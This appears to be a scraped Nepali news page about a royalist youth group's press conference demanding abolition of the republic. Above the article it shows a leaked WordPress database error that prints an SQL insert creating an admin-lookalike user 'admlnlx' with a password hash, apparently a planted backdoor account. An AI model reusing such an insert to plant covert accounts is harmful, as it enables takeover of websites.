WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjslWtNdALbHvypBycPd1lfxSOkb541', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:13:25', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १७–
शाही युवा शक्ति नेपालले विदेशीको ईशाराको चोरबाटोबाट ल्याईएको गणतन्त्र खारेज नगरेसम्म नेपाल र नेपालीहरुको भविष्य अन्यौल नै रहने भन्दै गणतन्त्र खारेजीको माग गरेको छ ।
शुक्रबार रिपोर्टर्स क्लब नेपालमा पत्रकार सम्मेलन गर्दै शाही युवा शक्ति नेपालले नेपालको ईतिहास भनेको नै राजसंस्था भएकोले राजसंस्थालाई पाखा लगाएर नयाँ नेपाल बन्नै नसक्ने समेत ठोकुवा गरेको छ । उसले राजसंस्था नभए देशको राष्ट्रियता पनि खतरामा पर्ने खतरा औंल्याएको छ ।
पत्रकार सम्मेलनमा बोल्दै शक्तिका अध्यक्ष पशुपति खड्काले राजसंस्थाले एकिकरण गरेको नेपाल अहिले गणतन्त्रको हिमायतीहरुले देशलाई छिन्नभिन्न बनाउनेतर्फ उत्सर्ग रहेको आरोप लगाउँदै भने,‘नयाँ नेपाल बनाउने निहुँमा ईतिहासलाई मेट्ने काम भएको छ, नेपालको राष्ट्रिय एकता, राष्ट्रिय अखण्डता, सार्वभौमसत्ता, राष्ट्रियता गुम्ने खतरा बढेर गएको छ, नेपाली जनताको चाहना विपरित विदेशीहरुको ईशारामा गणतन्त्र, धर्मनिरपेक्षता र संघीयता जबरजस्ती लाद्ने काम भएको छ, यो हामीलाई किमार्थ मान्य छैन ।’